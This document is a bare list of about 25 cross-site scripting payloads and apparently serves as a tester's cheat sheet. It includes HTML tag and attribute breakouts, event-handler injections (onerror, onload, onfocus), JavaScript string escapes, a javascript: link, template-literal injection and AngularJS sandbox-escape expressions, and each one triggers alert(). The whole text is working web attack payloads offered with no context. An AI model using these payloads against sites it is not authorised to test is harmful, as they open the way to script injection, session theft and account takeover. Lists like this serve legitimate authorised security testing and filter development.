a:'"/>a"><aa"><img src=x onerror=alert()>
a:"/>a"><aa"><img src=x onerror=alert()>
<script>alert(1)</script>
"onmouseover="alert(1)
"><img onload=alert(1)>
"><svg onload=alert(1)>
<script>alert(document.domain)</script>
<img src=1 onerror=alert(1)>
"><script>alert(document.domain)</script>
" autofocus onfocus=alert(document.domain) x="
<a href="javascript:alert(document.domain)">
</script><img src=1 onerror=alert(document.domain)>
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
\\';alert(document.domain)//
onerror=alert;throw 1
<a href="#" onclick="... var input='controllable data here'; ...">
&apos;-alert(document.domain)-&apos;
document.getElementById('message').innerText = `Welcome, ${user.displayName}.`;
${alert(document.domain)}
$eval('x=alert(1)')
[123]|orderBy:'Some string'
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
[1].map(alert)
